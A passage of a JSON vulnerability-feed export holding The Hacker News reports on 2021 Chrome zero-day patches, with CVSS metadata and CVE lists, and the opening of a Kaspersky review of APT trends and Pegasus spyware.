"LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-14T04:08:00", "type": "thn", "title": "Update Google Chrome to Patch 2 New Zero-Day Flaws Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-19T08:13:46", "id": "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "href": "https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:16", "description": "[](<https://thehackernews.com/images/-EBTuV2RF5wo/YU6_b4n3Y4I/AAAAAAAAD5w/Rv4cfNWgTzsitUR4O-m9Hoo5Jsb-IyxJACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Friday rolled out an emergency security patch to its Chrome web browser to address a security flaw that's known to have an exploit in the wild.\n\nTracked as [CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>), the vulnerability has been described as [use after free](<https://cwe.mitre.org/data/definitions/416.html>) in [Portals API](<https://web.dev/hands-on-portals/>), a web page navigation system that enables a page to show another page as an inset and \"perform a seamless transition to a new state, where the formerly-inset page becomes the top-level document.\"\n\nCl\u00e9ment Lecigne of Google Threat Analysis Group (TAG) has been credited with reporting the flaw. Additional specifics pertaining to the weakness have not been disclosed in light of active exploitation and to allow a majority of the users to apply the patch, but the internet giant said it's \"aware that an exploit for CVE-2021-37973 exists in the wild.\"\n\nThe update arrives a day after Apple moved to close an actively exploited security hole in older versions of iOS and macOS ([CVE-2021-30869](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>)), which the TAG noted as being \"used in conjunction with a N-day remote code execution targeting WebKit.\" With the latest fix, Google has addressed a total of [12 zero-day flaws in Chrome](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) since the start of 2021:\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n\nChrome users are advised to update to the latest version (94.0.4606.61) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-25T06:39:00", "type": "thn", "title": "Urgent Chrome Update Released to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30869", "CVE-2021-37973"], "modified": "2021-09-27T04:38:24", "id": "THN:6A9CD6F085628D08978727C0FF597535", "href": "https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:21", "description": "[](<https://thehackernews.com/images/-9Ndx9Vcrx9E/YHaB5SvoxwI/AAAAAAAACRI/WgbWr7Dgj6sRKNuvNcO4lj-zwEO5CNQdwCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nGoogle on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation.\n\nOne of the two flaws concerns an insufficient validation of untrusted input in its V8 JavaScript rendering engine (CVE-2021-21220), which was demonstrated by Dataflow Security's Bruno Keith and Niklas Baumstark at the [Pwn2Own 2021](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) hacking contest last week.\n\nWhile Google moved to fix the flaw quickly, security researcher Rajvardhan Agarwal published a [working exploit](<https://thehackernews.com/2021/04/rce-exploit-released-for-unpatched.html>) over the weekend by reverse-engineering the patch that the Chromium team pushed to the open-source component, a factor that may have played a crucial role in the release.\n\n**UPDATE:** _Agarwal, in an email to The Hacker News, confirmed that there's [one more vulnerability](<https://twitter.com/r4j0x00/status/1382125720344793090>) affecting Chromium-based browsers that has been patched in the latest version of V8, but has not been included in the Chrome release rolling out today, thereby leaving users potentially vulnerable to attacks even after installing the new update._\n\n\"Even though both the flaws are different in nature, they can be exploited to gain RCE in the renderer process,\" Agarwal told The Hacker News via email. \"I suspect that the first patch was released with the Chrome update because of the published exploit but as the second patch was not applied to Chrome, it can still be exploited.\"\n\nAlso resolved by the company is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink browser engine (CVE-2021-21206). An anonymous researcher has been credited with reporting the flaw on April 7.\n\n[](<https://thehackernews.com/images/-Co9nqKO9t2I/YHaAjushveI/AAAAAAAACRA/uFUYN6VpoCwJz2lCJEMBEGAwXowVZlR3wCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\n\"Google is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) in a blog post.\n\nIt's worth noting that the existence of an exploit is not evidence of active exploitation by threat actors. Since the start of the year, Google has fixed three shortcomings in Chrome that have been under attack, including [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>), [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>), and [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>).\n\nChrome 89.0.4389.128 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-14T05:48:00", "type": "thn", "title": "Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-14T08:32:40", "id": "THN:F197A729A4F49F957F9D5910875EBAAA", "href": "https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEggQTDQ-V9WbcSJKwsXKGeYWFxP3jSKikqYhYG8xpFa_NiB7aFJV8tcR11eRFpoq9nIOMlHfbefT2pZC9vdUHCul3SAafHr4t5T-oIIj-H61WEAlv8x9Mfzo1cqzuxor4bqF090P_C7w7fQqzoSFEmUVm1PvbmzU9YENMC2O_ZAEkOC_qbBbzYZdzhA>)\n\nGoogle on Thursday pushed urgent security fixes for its Chrome browser, including a pair of new security weaknesses that the company said are being exploited in the wild, making them the fourth and fifth actively zero-days plugged this month alone.\n\nThe issues, designated as [CVE-2021-37975 and CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>), are part of a total of four patches, and concern a [use-after-free flaw](<https://cwe.mitre.org/data/definitions/416.html>) in V8 JavaScript and WebAssembly engine as well as an information leak in core.\n\nAs is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks so as to allow a majority of users to be updated with the patches, but noted that it's aware that \"exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild.\"\n\nAn anonymous researcher has been credited with reporting CVE-2021-37975. The discovery of CVE-2021-37976, on the other hand, involves Cl\u00e9ment Lecigne from Google Threat Analysis Group, who was also credited with [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>), another actively exploited use-after-free vulnerability in Chrome's Portals API that was reported last week, raising the possibility that the two flaws may have been stringed together as part of an exploit chain to execute arbitrary code.\n\nWith the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n\nChrome users are advised to update to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-01T03:30:00", "type": "thn", "title": "Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976"], "modified": "2021-10-05T05:27:09", "id": "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "href": "https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEibt_uA0VwMgumOtohRzrBSD-Inv5dv71ZMU1Hu4XYJFQxp8FVjEZzeLUuvttUyYx1xMxQJ16Nfw5Jdc7mPLfwoGoTeZqrLRMZ005Eu673XGL_uJrq7LDUpWojmmmN1YHSwVQcJQzL28acTco05Z7auS001HlgSR96GjvrE5gDr2M123luTRVFTFcAT>)\n\nGoogle has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the [17th such weakness](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) to be disclosed since the start of the year.\n\nTracked as [CVE-2021-4102](<https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html>), the flaw relates to a [use-after-free bug](<https://cwe.mitre.org/data/definitions/416.html>) in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw.\n\nAs it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, \"it's aware of reports that an exploit for CVE-2021-4102 exists in the wild.\" This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.\n\nCVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>), also reported by an anonymous researcher, plugged in an update it shipped on September 30. It's not immediately clear if the two flaws bear any relation to one another.\n\nWith this latest update, Google has addressed a record 17 zero-days in Chrome this year alone \u2014\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals \n * [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [CVE-2021-37976](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n * [CVE-2021-38000](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Insufficient validation of untrusted input in Intents\n * [CVE-2021-38003](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Inappropriate implementation in V8\n\nChrome users are recommended to update to the latest version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T04:13:00", "type": "thn", "title": "Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102"], "modified": "2021-12-14T04:30:59", "id": "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "href": "https://thehackernews.com/2021/12/update-google-chrome-to-patch-new-zero.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:09", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgMs77BPvPvj6P-3E7i08R8I_ixvGQZgvS5p1CxbhBqiARNzNLx3R6X1fYdCRjiQmZfLY3-6HUY_hPXAucE_jFVypFTV0HG0XIru72uSOfwfn3mMcLC9j6XyeOCF7We4fYjthQ17-YmGUSvhPWEOlnBXakT_9U8IYdpMKEB6GeCFMJI8ihho5D-6JUO>)\n\nGoogle on Thursday rolled out an emergency update for its Chrome web browser, including fixes for two zero-day vulnerabilities that it says are being actively exploited in the wild.\n\nTracked as **CVE-2021-38000** and **CVE-2021-38003**, the weaknesses relate to insufficient validation of untrusted input in a feature called Intents as well as a case of inappropriate implementation in V8 JavaScript and WebAssembly engine. The internet giant's Threat Analysis Group (TAG) has been credited with discovering and reporting the two flaws on September 15, 2021, and October 26, 2021, respectively.\n\n\"Google is aware that exploits for CVE-2021-38000 and CVE-2021-38003 exist in the wild,\" the company [noted](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>) in an advisory without delving into technical specifics about how the two vulnerabilities were used in attacks or the threat actors that may have weaponized them.\n\nAlso addressed as part of this stable channel update is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in the Web Transport component (CVE-2021-38002), which was demonstrated for the first time at the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) contest held earlier this month in China. With these patches, Google has resolved a record 16 zero-days in the web browser since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [**CVE-2021-30632**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [**CVE-2021-30633**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [**CVE-2021-37973**](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n * [**CVE-2021-37975**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [**CVE-2021-37976**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n\nChrome users are advised to update to the latest version (95.0.4638.69) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-29T04:08:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch 2 Actively Exploited 0-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38002", "CVE-2021-38003"], "modified": "2021-10-29T04:08:52", "id": "THN:B7217784F9D53002315C9C43CCC73766", "href": "https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of 